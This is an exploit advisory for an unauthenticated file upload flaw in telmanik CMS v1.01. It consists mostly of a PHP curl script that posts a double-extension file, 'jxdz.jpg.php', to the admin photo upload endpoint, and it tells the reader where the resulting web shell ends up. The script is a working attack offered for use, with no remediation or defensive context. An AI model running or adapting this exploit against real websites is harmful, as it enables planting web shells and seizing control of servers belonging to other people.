/*
##########################################################################

Exploit title : telmanik cms v1.01 File Upload

Date : 12/12/2013

Author : JoKeR_StEx

Software Link : http://www.telmanik.com/open-source.php

Tested On : WinXP PRO SP3

CVE : [~]

Version : 1.01

#########################################################################
*/

1) File Upload

P.O.C

<?

# <3Algeria<3

$web = "http://127.0.0.1/telmanik/upload/admin/photo_upload.php";
$dz = curl_init();
$shell = "jxdz.jpg.php";
curl_setopt($dz,CURLOPT_URL,$web);
curl_setopt($dz,CURLOPT_RETURNTRANSFER,true);
curl_setopt($dz,CURLOPT_HEADER,false);
curl_setopt($dz,CURLOPT_VERBOSE,false);
curl_setopt($dz,CURLOPT_POST,true);
$jxarray = array("image1"=>"@".$shell);
curl_setopt($dz,CURLOPT_POSTFIELDS,$jxarray);
$exec=curl_exec($dz);
$end=curl_close($dz);

?>

//The Shell YOu cAn Find it in /photos/